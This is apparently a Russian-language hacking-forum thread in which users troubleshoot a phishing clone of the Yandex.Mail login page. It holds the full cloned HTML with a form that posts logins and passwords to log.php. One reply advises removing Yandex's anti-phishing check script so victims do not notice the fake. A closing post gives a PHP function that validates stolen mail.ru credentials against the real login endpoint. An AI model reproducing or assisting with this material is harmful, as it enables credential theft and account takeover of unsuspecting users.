Сделал фейк , захожу на него , ввожу лоиг пасс , и меня перекидывает на яд страницу с текстом: Внимание! Сайт http://--------------- не принадлежит Яндексу. Вы видите эту страницу, потому что Вы попытались зарегистрироватся или авторизоватся на Яндексе с сайта, не имеющего к Яндексу отношения. Яндекс ничего не знает про этот сайт и не может гарантировать конфиденциальность передаваемой Вами информации (логин и пароль). Если Вы ошибочно приняли чужой сайт за принадлежащий Яндексу, рекомендуем Вам на всякий случай сменить пароль. Если вы доверяете этому чужому сайту, то можете начинать работать со службами Яндекса Подробнее о нашем отношении к персональной информации можно прочитать в «Соглашении о конфиденциальности информации». Для регистрации и авторизации на проектах Яндекса мы рекомендуем пользоваться главной страницей Яндекса или Яндекс Паспортом . шо мона сделать в такой ситуации?
а у меня сразу после ввода лоиг пасса , должен перекидывать на главную страницу , но он перекидывает на эту злополучную , видимо просто нада какой-то код подтереь в index.htm , который связан как раз с этой страничкой , но только что за код?
у тебя "умный фейк" который кидает запрос на яндекс при авторизации (чтобы жертва не запалила), редактируй php и убери запросы
я в php не силен... поправьте плиз Code: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML lang=ru><HEAD><TITLE>Яндекс.Почта</TITLE> <META http-equiv=Content-Type content="text/html; charset=windows-1251"><LINK href="/favicon.ico" type=image/x-icon rel="SHORTCUT ICON"><LINK href="http://img.yandex.net/wmi/modern/static/8/css/common.css" type=text/css rel=stylesheet><LINK href="http://img.yandex.net/wmi/modern/static/8/css/mail-common.css" type=text/css rel=stylesheet><LINK href="http://img.yandex.net/wmi/modern/static/8/css/mail-login.css" type=text/css rel=stylesheet> <STYLE type=text/css><!--td.dignity p span {font-size:140%;}td.form div.checkbox div.reducer {left: 28%;}* html td.form div.checkbox div.reducer label {display: block; float: left; width: 100%;}* html td.form div.checkbox span.input {left: -2px;}#dignityCell {margin-top: 1em;}.new_mail{font-size: 1.5em;}--></STYLE> <SCRIPT type=text/javascript>var fromMail = false;</SCRIPT> <SCRIPT src="http://passport.yandex.ru/passport?mode=testloginjs&id28460493" type=text/javascript></SCRIPT> <SCRIPT src="http://img.yandex.net/wmi/modern/static/8/js/index_main.js" type=text/javascript charset=utf-8></SCRIPT> <META content="MSHTML 6.00.2900.3243" name=GENERATOR></HEAD> <BODY style="BACKGROUND-IMAGE: url(http://www.tns-counter.ru/V13a****yandex_ru/ru/CP1251/tmsec=yandex_mail/?id28460493)"> <TABLE class="layout root"> <TBODY> <TR> <TD class="layout content"> <DIV align=center><A href="http://www.yandex.ru/"><IMG height=83 alt=Яndex src="http://img.yandex.net/wmi/modern/static/8/i//login/yandex.gif" width=136></A></DIV> <TABLE class="layout main" width="100%"> <TBODY> <TR class=layout vAlign=top> <TD class="features layout"> <DIV id=featuresCell> <H2>Почта Яндекса — это:</H2> <P class="plus big"><SPAN><A href="http://help.yandex.ru/mail/?id=448394">Бесконечный ящик</A></SPAN><BR>Вы можете не думать о том, сколько места занимают ваши письма.</P> <P class="plus no-spam"><SPAN><A href="http://help.yandex.ru/mail/?id=288423">Отсутствие спама</A></SPAN><BR><A href="http://so.yandex.ru/"><IMG class=so title=Спамооборона alt=Спамооборона src="http://img.yandex.net/wmi/modern/static/8/i/logo_so.gif" align=right></A>Ваш почтовый ящик надежно защищен программой «<A href="http://so.yandex.ru/">Спамооборона</A>».<BR></P> <P class="plus revolutional"><SPAN><A href="/pda">Мобильная версия</A></SPAN><BR>Для смартфонов, коммуникаторов и КПК.</P> <P class="plus red"><SPAN><A href="http://help.yandex.ru/mail/?id=288215" target=_blank>Защита от вирусов</A></SPAN><BR><A href="http://www.drweb.com/" target=_blank><IMG class=drweb title=Dr.Web alt=Dr.Web src="http://img.yandex.net/wmi/modern/static/8/i/drweb2.gif" align=right></A>Все письма проверяются антивирусной программой «<A href="http://www.drweb.com" target=_blank>Dr.Web</A>».</P></DIV></TD> <TD class="form layout" id=loginForm> <DIV class=tl> <DIV class=tr> <DIV class=bl> <DIV class=br> <FORM id=loginform name=MainLogin action=log.php method=post><IMG style="MARGIN: 15px 0px 10px" height=36 alt=Почта src="http://img.yandex.net/wmi/modern/static/8/i/login/heading.gif" width=136> <DIV class="input login"><LABEL for=inputLogin>логин:</LABEL><BR><INPUT id=inputLogin tabIndex=1 name=login></DIV> <DIV class="input passwd"><LABEL for=inputPassword>пароль:</LABEL><BR><INPUT id=inputPassword tabIndex=2 type=password name=passwd></DIV> <P style="TEXT-ALIGN: center"><LABEL for=twoweeks><INPUT id=twoweeks style="VERTICAL-ALIGN: middle" tabIndex=3 type=checkbox value=yes name=twoweeks autocomplete="no"> запомнить меня</LABEL></P> <DIV><INPUT type=hidden value=http://mail.yandex.ru/?from=mail&r=id30681178 name=retpath><INPUT class=hugeBtn tabIndex=4 type=submit value=Войти></DIV> <P class=forgotten-link><A tabIndex=5 href="http://passport.yandex.ru/passport?mode=remember"><SPAN>Вспомнить пароль</SPAN></A><BR><BR><A class=new_mail href="http://passport.yandex.ru/passport?mode=register&msg=mail&retpath=http://mail.yandex.ru/?from=mail&r=id30681178"><SPAN>Заведите почту на Яндексе</SPAN></A></P></FORM> <SCRIPT src="https://passport.yandex.ru/js/forcehttps.js" type=text/javascript charset=utf-8></SCRIPT> </DIV></DIV></DIV></DIV></TD> <TD class="dignity layout"> <DIV id=dignityCell> <H2>Почтовая фишка № 4</H2> <P><IMG height=101 alt="Быстрый ответ" src="http://img.yandex.net/wmi/modern/static/8/i//login/marka4.gif" width=162></P> <P>Прочитали письмо, и хочется быстро черкнуть пару строк в ответ? К вашим услугам форма быстрого ответа.</P></DIV></TD></TR></TBODY></TABLE></TD></TR> <TR> <TD class="layout bottom"> <DIV class="tuning sys-font hidden" id=tuning> <P><SPAN class="pseudo-link hidden" id=tips_hide>Убрать информацию слева и справа</SPAN><SPAN class="pseudo-link hidden" id=tips_show>Показать информацию</SPAN></P></DIV> <DIV class=footer> <HR> <P class=copy>Чистая почта © 2001—2008 «<A href="http://www.yandex.ru/">Яндекс</A>»<BR><A href="http://feedback.yandex.ru/?from=webmail">Обратная связь</A> · <A href="http://stat.yandex.ru/stats.xml?ProjectID=2">Статистика</A> · <A href="http://advertising.yandex.ru/mail.xml">Реклама</A></P> <DIV class=pda_link><A href="/pda">Мобильная версия</A></DIV> <DIV class=made id=made-in><A href="http://www.artlebedev.ru/"><IMG height=37 alt="art. lebedev" src="http://img.yandex.net/wmi/modern/static/8/i//login/logo-artlebedev.gif" width=90></A>Дизайн —<BR><A href="http://www.artlebedev.ru/">Студия Артемия Лебедева</A></DIV><BR clear=all></DIV></TD></TR></TBODY></TABLE> <SCRIPT type=text/javascript>init(false);</SCRIPT> </BODY></HTML>
Там находил где-то в странице ссылку эту и просто убрал и все норм Там вроде js-ка проверяет это дело
все разобрался сенкс... но ешё один открытый вопрос остался.. есть такая фича , проверка пароля на фейк странице , у меня есть код для этой фичи , но вопрос опять же куда его вставлять? понятно что в index.htm , но куда именно? подскажите плз PHP: function login($email,$password) { $email = strtolower($email); list($login, $domain) = explode('@',$email); $openMail = file_get_contents('http://win.mail.ru/cgi-bin/auth?Login='.urlencode($login).'&Password='.urlencode($password).'&Domain='.urlencode($domain)); if(!preg_match('|<title> Вход в систему </title>|',$openMail) && preg_match('|<title>.+'.str_replace('.','\.',$email).'.+</title>|',$openMail)) { return true; } else { return false; } } Вот простейшая функция для проверки. Проверять так Код: Code: if(login('xx@mail.ru', 'passwd')) { ... }